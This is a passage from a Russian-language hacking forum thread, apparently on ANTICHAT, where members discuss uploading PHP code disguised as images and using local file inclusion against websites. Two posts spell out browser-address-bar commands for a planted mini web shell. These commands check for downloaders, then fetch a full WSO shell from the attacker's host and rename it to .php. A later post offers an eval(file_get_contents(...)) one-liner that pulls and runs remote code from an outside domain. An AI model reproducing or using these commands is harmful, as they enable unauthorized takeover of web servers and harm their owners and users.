HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 11.03.2012, 07:56
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Alex2103,

lol. Как .jpg будет выполнятся как .php, если нет .htaccess-а? Думаю ТС сказал про exif, чтобы помочь при LFI.
 
Ответить с цитированием

  #102  
Старый 11.03.2012, 13:50
Alex2103
Новичок
Регистрация: 06.03.2011
Сообщений: 4
С нами: 7993046

Репутация: 0
По умолчанию

ребят подскажите я обхожу фильтры, у меня картинка закачивается

всё ок! коменты остаются

ну как мне понять работает ли эта уязвимость на этом сайте

вдруг админ заблочил

то есть, я имею ввиду, и так и сяк пробовал не получается ((
 
Ответить с цитированием

  #103  
Старый 11.03.2012, 23:54
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от Га-Ноцри  
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Например мы залили , тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;[/COLOR][/COLOR] 
// Узнаем "качалку", если fetch, то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php[/COLOR][/COLOR] 
// Заливаем полноценный шелл
Если мы залили , то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");[/COLOR][/COLOR] 
Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.
ок, подправим
 
Ответить с цитированием

  #104  
Старый 17.03.2012, 21:34
BLurpi^_^
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами: 8029046

Репутация: 9
По умолчанию

Цитата:
Сообщение от Га-Ноцри  
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Например мы залили , тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;[/COLOR][/COLOR] 
// Узнаем "качалку", если fetch, то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php[/COLOR][/COLOR] 
// Заливаем полноценный шелл
Если мы залили , то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");[/COLOR][/COLOR] 
Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.
зачем это, если можно тупо ?e=eval(file_get_contents('http://updateyou.ru/1.txt'));
 
Ответить с цитированием

  #105  
Старый 24.03.2012, 15:34
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Ну, это почти всегда срабатывает =)
 
Ответить с цитированием

  #106  
Старый 25.03.2012, 07:40
sasha.seven
Познающий
Регистрация: 04.06.2011
Сообщений: 45
С нами: 7863446

Репутация: 1
По умолчанию

Полезная инфа благодарю, пару методов уже знал но всё равно добавилось знаний
 
Ответить с цитированием

  #107  
Старый 25.03.2012, 19:57
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Честно говоря, есть ещё пару методов, но их раскрывать не стоит
 
Ответить с цитированием

  #108  
Старый 25.03.2012, 20:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Мы сдесь делимся общеми методами, чтоб была пища для мозгов что и как можно сделать и что из этого всего общего приготовить свое уникальное, а не своими уникальнастями)

P.S: OxoTnik - не выложим
 
Ответить с цитированием

  #109  
Старый 25.03.2012, 22:00
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

хватит выпендриваться. у вас просто нету ничего такого.
 
Ответить с цитированием

  #110  
Старый 26.03.2012, 01:39
GrandMaster
Постоянный
Регистрация: 16.05.2009
Сообщений: 309
С нами: 8940779

Репутация: 112
По умолчанию

Охотник такой клоун, ой я не могу

P.s да покарает меня модер за флуд и оффтоп
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.